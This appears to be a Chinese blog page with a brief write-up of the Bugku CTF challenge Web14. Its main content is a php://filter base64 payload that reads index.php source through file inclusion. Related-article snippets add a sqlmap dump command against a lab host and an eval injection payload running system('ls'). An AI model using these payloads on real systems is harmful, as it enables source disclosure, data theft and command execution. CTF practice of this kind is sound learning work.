首页 > 其他分享 >Bugku-Web14

Bugku-Web14

时间:2023-08-29 16:58:08浏览次数:39  
标签:index convert Bugku resource Web14 php

images

php://filter/read=convert.base64-encode/resource=index.php

images

images

标签:index,convert,Bugku,resource,Web14,php
From: https://www.cnblogs.com/KAKSKY/p/17665289.html

相关文章

  • Bugku-Web17
    这是sql的注入题我自己的sql注入学的还不是很到位,这个题目有很学习的意味:;;第一个是通过sqlmap的注入的方式:python3.\sqlmap.py-u"http://114.67.246.176:18696/index.php"--methodPOST--data"id=1"-Dskctf-Tfl4g-Cskctf_flag--dumppythonsqlmap.py-uurl--......
  • Bugku-冬至红包
    这个题目的考察的还是代码审计,还有eval函数的利用,当然还有对过滤这些因素的审查。代码块就直接放下面了:先刷题,改天再回过来看。<?php    error_reporting(0);    require __DIR__.'/flag.php';    $exam = 'return\''.sha1(time()).'\';';    if (!i......
  • BUGKU
    初入Python,看到很多大佬都是通过写脚本的方式获取到FLAG,因为抓到的包的response里falg一直会变。这里呈上大佬的Python脚本。顺便学习,把函数的用法记下,方便日后自己的学习。pyjin1#!/usr/bin/envpython3blacklist=["/","0","1","2","3","4","5","6",&q......
  • BUGKU逆向reverse 1-8题
    练习IDA两年半打开尘封已久的bugku,从题目中练习使用,现在都已经是新版本了orz入门逆向运行baby.exe将解压后的baby.exe拖到IDA里面主函数中找到mov指令可以看到这里就是flagflag{Re_1s_S0_C0OL}signin下载附件解压之后是sign_in.apk,Android逆向我不会啊orz丢到AndroidKil......
  • CTFer成长记录——CTF之Web专题·bugku—never_give_up
    一、题目链接https://ctf.bugku.com/challenges/detail/id/88.html二、解法步骤  打开网页,url中看到id=1,修改成2、3、4发现无反应。然后查看网页源代码:,提示一个网址,直接访问看看:发现url跳转到了bugku的论坛:    BP抓1p.html网页的包,在返回包中发现一串密文:  --JTI......
  • bugku_文件上传_wp
    bugku_文件上传payload点击查看payloadPOST/index.phpHTTP/1.1Host:114.67.175.224:16103Content-Length:308Cache-Control:max-age=0Upgrade-Insecure-Requests:1Origin:http://114.67.175.224:16103Content-Type:Multipart/form-data;boundary=----WebKitFo......
  • CTFer成长记录——CTF之Web专题·bugku—备份是个好习惯
    一、题目链接https://ctf.bugku.com/challenges/detail/id/83.html?id=83二、解法步骤  打开网站,发现是一串字符串:    解码:[空密码]/[EmptyString],无结果。题目提示“备份是个好习惯”,那么尝试访问index.php.bak和index.php.swp,这两个文件,看看存不存在。于是在index.......
  • CTFer成长记录——CTF之Web专题·bugku-啊哒
    一、题目链接  https://ctf.bugku.com/challenges/detail/id/6.html?id=6二、解法步骤  打开图片:  显示完整,似乎没有文件高度的问题。右键查看属性——>文件详细信息:发现一串16进制数:尝试转换成字符串:https://www.sojson.com/hexadecimal.html  得到:sdnisc_20......
  • CTFer成长记录——CTF之Web专题·bugku-眼见非实
    一、题目链接  https://ctf.bugku.com/challenges/detail/id/5.html二、解法步骤  解法压缩包是一个.docx文件,打开该文件后发现一堆乱码:  结合题意:“眼见非实”,猜测该docx文件融合了其他的文件。用010打开看看:  发现了压缩包的文件头,于是用binwalk尝试文件拆分:binwal......
  • CTFer成长记录——CTF之Web专题·bugku-eval
    一、题目链接https://ctf.bugku.com/challenges/detail/id/75.html?id=75二、解法步骤  打开网页是一段php代码,其中include"flag.php"提示可能有文件包含漏洞,接着使用了eval函数,那么可能存在命令执行漏洞。    先用system('ls')命令看看:?hello=system('ls'):......